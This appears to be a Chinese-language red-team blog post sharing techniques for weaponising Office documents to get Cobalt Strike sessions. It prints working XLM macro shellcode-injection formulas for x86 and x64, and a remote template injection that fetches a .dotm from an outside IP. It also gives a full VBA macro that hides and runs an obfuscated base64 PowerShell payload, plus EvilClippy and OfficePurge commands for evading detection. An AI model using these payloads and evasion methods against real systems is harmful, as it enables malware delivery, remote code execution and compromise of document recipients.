Offensive Doc 笔记

禁止平庸！！！！

在团队内的分享，记录一下

一、XLM Macro(Excel 4.0)

与一般的office文档不同的是，其格式为XLM，不同于其他的XML，XLM被创建于1992年，比VBA还要早出很多。

demo：

这项技术在2018年，在这个文章中被指出：https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

由此也衍生出了很多的相关项目，比如(Excel4-DCOM：https://github.com/outflanknl/Excel4-DCOM)：

1	Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin

其也是依靠XLM的来调用win32API来实现远程线程注入：

SharpShooter：https://github.com/mdsecactivebreach/SharpShooter 利用该工具创建XLS Macro的方法如下：

1	SharpShooter.py --payload slk --output foo --rawscfile ~./x86payload.bin --smuggle --template mcafee

生成的SLK文件如下：

原理基本类似。不过这种都是基于X86的，X64有一些问题，有一篇文章（https://www.cybereason.com/blog/excel4.0-macros-now-with-twice-the-bits）介绍了该问题。

最后衍生的工具：https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a

当然还有很多相关的工具（Macrome：https://github.com/michaelweber/Macrome、EXCELntDonut：https://github.com/FortyNorthSecurity/EXCELntDonut）等等。

进程注入

在XLS中支持win32的调用，也就意味着我们可以进行进程注入等操作。调用方式如下：

1	REGISTER(module_name, procedure_name, type, alias, argument, macro_type, category)

需要注意的是，区分x86与x64，x86的demo如下：

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","WriteProcessMemory","JJJCJJ","WProcessMemory",,1,9)
=REGISTER("Kernel32","CreateThread","JJJJJJJ","CThread",,1,9)
=Valloc(0,65536,4096,64)
=SELECT(B1:B999,B1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"excel")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=WProcessMemory(-1,A10+(D1*255),ACTIVE.CELL(),LEN(ACTIVE.CELL()),0)
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=CThread(0,0,A10,0,0,0)
=HALT()

x64demo如下：

=REGISTER("Kernel32","VirtualAlloc","JJJJJ","Valloc",,1,9)
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=WHILE(A22=0)
=SET.VALUE(A22,Valloc(A21,65536,12288,64))
=SET.VALUE(A21,A21+262144)
=NEXT()
=REGISTER("Kernel32","RtlCopyMemory","JJCJ","RTL",,1,9)
=REGISTER("Kernel32","QueueUserAPC","JJJJ","Queue",,1,9)
=REGISTER("ntdll","NtTestAlert","J","Go",,1,9)
=SELECT(C1:C3479,C1)
=SET.VALUE(D1,0)
=WHILE(ACTIVE.CELL()<>"EXCEL")
=SET.VALUE(D2,LEN(ACTIVE.CELL()))
=RTL(A22+(D1*10),ACTIVE.CELL(),LEN(ACTIVE.CELL()))
=SET.VALUE(D1,D1+1)
=SELECT(,"R[1]C")
=NEXT()
=Queue(A22,-2,0)
=Go()
=SET.VALUE(A22,0)
=HALT()

这里方便起见直接使用EXCELntDonut来生成。使用Cs生成shellcode，然后替换到指定位置：

然后运行：

1	EXCELntDonut -f exe_source.cs -r System.Windows.Forms.dll

然后将数据插入，并处理

然后执行即可。可惜测试时一直失败。

Evasion

效果相等：

宏隐藏

（https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/b9ec509a-235d-424e-871d-f8e721106501）：

即改成02

此时已无法显示隐藏：

EPPLUS：EPPlus 5-Excel spreadsheets for .NET

EPPLUS是一个用来生成Excel的.net库。https://github.com/EPPlusSoftware/EPPlus

利用该程序可以更改的免杀excel，demo：https://github.com/FortyNorthSecurity/hot-manchego

用法：

1 2	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll hot-manchego.cs hot-manchego.exe blank.xlsm vba.txt

执行宏，获取Cs会话。

二、powerpoint

这种攻击则利用的是鼠标轨迹来进行操作，比如鼠标点击、鼠标移动等。操作如下：

插入Cs生成的hta文件。点击时，

Cs上线。

三，远程加载文档

每一个文档都是一个zip文件，解压，编辑

修改为：

1	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://192.168.1.106/1.dotm" TargetMode="External"/>

此时打开文档，运行宏即可上线。

四，控件

直接上代码：

Sub Main()
On Error Resume Next
createTextBoxs
ExecuteTextBoxCommands
End Sub

Sub createTextBoxs()
On Error Resume Next
Dim objTextBox As Shape
Dim secretkey As Long
Dim str As String
Dim zHf As String
Dim payload As String

payload = "H4sIAAAAAAAAAK1WaW/iShb9nPwKf4gEKCQBs4U3ivQAYzDGxmA2kxdFZbuAMuWtvGDzpv/7lA2k09PpmZZmkJCr7LucOnepq8Lw"
payload = payload + "QQ0JMkLJNSHzsIQkQK7DsLe328gxwmydLd53MHz3iGu8A9MkMAiYv29vFECAzRTvYkDebdeMMCwz+SYThGZEYOnm5vYmfxU5AdjC"
payload = payload + "dweEKIbvNgz3rhkwL0zxteN5nGsD5Lz98UcvIgQ64Xn/OIBhJwigrWMEg2KJ+Sez2kMCHya6BY2Q+Zu5e38cYFcH+CKW9oCxp6fo"
payload = payload + "OGb2bewaIDvBo+phFBYLf/1VKL0+VN8e+34EcFAsqGkQQvvRxLhQYr6VMofz1IPFgoQM4gbuNnxcIafGPi5y9HIOXjpjL5QuJ9t5"
payload = payload + "gJ7j14fMrJ51igW6VCg3nTOHhTLzmvl7fXtj/vxAM4ucENnwUXBCSFxPhSRGBgweh8AxMZzBLVUrBDRmzq5QoiAIDCPiMFcsVC92"
payload = payload + "D7B450QYl6nd19+1+1aU4fFK7u8qFT8rUSklJKXyJSd+hw4pz5uzOXqcn9B/Sq4S/f2UYKXbb1+lqgkx3IEQvoeU30+5entz85ov"
payload = payload + "IT1PUXEDlOu9MJUyI1EQIHRJmoVzTiJYevsen7Pbq2ZQ/qWh6lXronMOzxnHC/O6dJH5dntTur1kT/b+XY8QNiHJvv+6Gji4RQ7k"
payload = payload + "UgfYyLgmfPGrmMEthjkfj1cxmeIsFi4foMld2ClkhL7+rNa3Ufih2z2D6xg07gFFRVOi9COYcwyLBcGRoE35O+9pmt5taZnBq/Sl"
payload = payload + "tNKr92yf5XIPgyAoM0pE69woMyoEGJplpuME6PKpE4Vuvix8hytFOEQGCMKrubfSF5ReXPdch1ZMZNDoUhrmqgcNBHDGSpkZIhN2"
payload = payload + "UxXtrhAKX3LSAxjTkqOWYhoT+ibjQg2znCFm+d/zo/SowlCwPQxtKp13IR6DHe05l4rK0w3soFn4D7CvdXIuioyrK0mfQNMEULEb"
payload = payload + "lpklIiHta4XyT4n3v8H7scX8ALNH4CWQxbwQhS1t6OcuQNkJ0Ik2Y+gzz6WsBF+7aZjVUm7GyK6blw+ic1pJSJV44tpdEMBmXc17"
payload = payload + "XLFQY6Nd0lbGzVSyBHaUao6cGM6S9GN+AJr7ZMpGrjEPiT/sc3Q/M9ggwAPs6fuxD5KxZSXt3jrtKx12jJqogYRo3D05PDJsqjed"
payload = payload + "uNqsTYRY5l0ctMQev1oAZPm5r8iuV80+SMcno7knExa62lH2hVjpmKvYaNqiyzdDqruM+pFH+tFE0aKxP7YFVN/H3DIcxcLgeSiy"
payload = payload + "GnjGegvm+qaf+dL8XQyy/amd7ZHfgyTzo1H2Ya3ahKtRS3M8BFfR7nSUkWGeOMiO6PvIlQwvqMknY3s4WMCrLtRDVZwvNmvKTRX4"
payload = payload + "hNebRNU8HC87i0NN2ZAcW8xTjHKGExns6KR5h4259Ps1RRcWQ0z8aITsp2kqpBcZe5Sqapc+xY0p+s8N88SmQ68OmgRRThPqp5Xx"
payload = payload + "aywCS1hNHGPNI9vYs9zMMtp25Dco7vpQHonrhPjhiPgx9hsTxchw53qZ/LSOJ1Uq7+vWWAT3ApIs0D4FYxHG2TpVODFJBUt4jrqZ"
payload = payload + "HjdIsL48WF61Dpsjh8XTNteWoCfaUjxTm7Mu6K6T+27aHyxUMx0kHW4trp86+nbnBq2DI3X1eijMOi2LsLzJpz01RYcnvD7E7Hij"
payload = payload + "zPGgsmhMogrkYCqzi/5mxtmj/uxQXQ+mcjTnsTivtHtcV5P7R2k87SeTRWW0Vg+8MtvvON3p+pudBLiZpHVqMxoPU1ryHU5fGxw/"
payload = payload + "raiDjlxbLLxhZu9sw41EVe6tZ5u+IE3WvV2j20Lb0xPeWa1D41CVN+0F2R21mWDp3hYE7BE1gHrfirzOXN427bm7ZTdNQYOVJQSg"
payload = payload + "eqqAlup3dhOzJ676+/V4IdaaRnP69BwYadVSWEGdP8faUF7K4ux5GRw30ugETZ+7r7DcWtr5glLbhEHYqlYPykwTLHmkVO6TrZxU"
payload = payload + "HWEyu190h9I8iWuidtQAqVQr3LY+8AbcsO1BzK0XVb/fdNd7rr6vI3u8DFvjCm0fdrNXc+yFtnna1FyV666D8XxUG+0loOimtrfm"
payload = payload + "aNDg96fB0FdOvUa9Fh/1+kpqrCSho1U7w+kgGdvyuj4YidOBYGlebY5dvnrOaX9Dc5XWqKgLp6xWRaDlNStuYN08JuGJBa3u0RhE"
payload = payload + "fkL/FZqT9ysqe8xkfJ+leS3pK/9I8xo0OafT1K1lY8n7vRkRoh6te70Ca2ELpJolULvGPTeO5ZZR6wqgT+PJzwK5v6uo/WRhGcg3"
payload = payload + "5ruXl7xVbl1Cp58kmyj+wdDnAw6Zj4ZH2xxtr9n7+/u8Jd58fHq9S96uY+TH/kFPqLla4/bm23VeiMGnrvmr6UwCJNgDTLspnbCu"
payload = payload + "9yPvEv4yJykuyjSKxa9H+wMkDsR07KWD8fVW6WDsGtlk94sR68+Pvk9vzwVd1tgvV6XvF0SpdL369Gi7zcefyxGvU+D3q2RDz1f+"
payload = payload + "ROQYOrtwX2YqSa1SqWTPeoVa+31ieq6XFj/slbP57xOUz65w7upjYCORY8P/Ywx+8Prf2c34y2fI7+zliL6mLLuU/wU5qB694w0A"
payload = payload + "AA=="


zHf = " -NoP -NonI  -Command ""Invoke-"
zHf = zHf + "Expression $(New-Object IO.StreamReader ($(New-O"
zHf = zHf + "bject IO.Compression.DeflateStream ($(New-Object"
zHf = zHf + " IO.MemoryStream (,$([Convert]::FromBase64String"
zHf = zHf + "(\"" " & payload & " \"" )))), [IO.Compression.Compr"
zHf = zHf + "essionMode]::Decompress)), [Text.Encoding]::ASCI"
zHf = zHf + "I)).ReadToEnd();Read-Host;"""

secretkey = RGB(1, 33, 7)
Debug.Print "Adding Embedded Command Shape Into Document"
Set objTextBox = ActiveDocument.Shapes.AddTextbox(msoTextOrientationHorizontal, 0, 0, 0, 0)
With objTextBox
    .TextFrame.TextRange.Text = "powershell.exe|" + zHf + "|open|1"
    .Name = "Shell.Application"
    .Height = 1
    .Width = 1
    .Visible = msoFalse
    .Shadow.Visible = True
    .Shadow.ForeColor.RGB = secretkey
    If .Shadow.ForeColor.RGB <> secretkey Then
        Debug.Print "Fail to set secret key"
    End If
    Debug.Print "Secret Key For Command Shape: " & CStr(.Shadow.ForeColor.RGB)
    .AlternativeText = "ShellExecute"
    .TextFrame.TextRange.Font.TextColor.RGB = ActiveDocument.Background.Fill.BackColor
End With
End Sub

Sub ExecuteTextBoxCommands()
On Error Resume Next
Dim objCmdShape As Shape
Dim secretkey As Long
Dim cmdParams() As String
Dim cmdCommand As String
Dim cmdType As String
Dim cmdObj As Object
secretkey = RGB(1, 33, 7)
For x = 1 To ActiveDocument.Shapes.Count
    Set objCmdShape = ActiveDocument.Shapes(x)
    If objCmdShape.Shadow.ForeColor.RGB = secretkey Then
        Debug.Print "Discovered Command Text Object"
        cmdType = objCmdShape.Name
        cmdCommand = objCmdShape.AlternativeText
        cmdParams = Split(objCmdShape.TextFrame.TextRange.Text, "|")
        Debug.Print "Command Type To Execute: " & cmdType
        Debug.Print "Command To Execute: " & cmdCommand
        Debug.Print "Command Params to Execute: " & Join(cmdParams, " & ")
        Set cmdObj = Interaction.CreateObject(cmdType)
        VBA$.[Interaction].CallByName! cmdObj, [cmdCommand], VbMethod, cmdParams(0), cmdParams(1), cmdParams(2)
        objCmdShape.Delete
        ActiveDocument.Save
        Exit For
    End If
Next
End Sub

没啥好手的就是利用控件去执行指定的程序。

五，VBA Stomping

直译过来就是VBA重踏。怎么去理解这个东西呢，比如说我们创建一个基础的VBA代码：

当我们解压该文档，并将其使用0填充时，依旧可以去执行，就行下面这样：

改为：

此时仍然可以使用。

武器化：https://github.com/outflanknl/EvilClippy

编译命令：

1	csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs

使用：

1 2	EvilClippy.exe -s fakecode.vba macrofile.doc EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc

六，VBA Purging

武器化：https://github.com/fireeye/OfficePurge

OfficePurge.exe -d word -f .\malicious.doc -m NewMacros
OfficePurge.exe -d excel -f .\payroll.xls -m Module1
OfficePurge.exe -d publisher -f .\donuts.pub -m ThisDocument
OfficePurge.exe -d word -f .\malicious.doc -l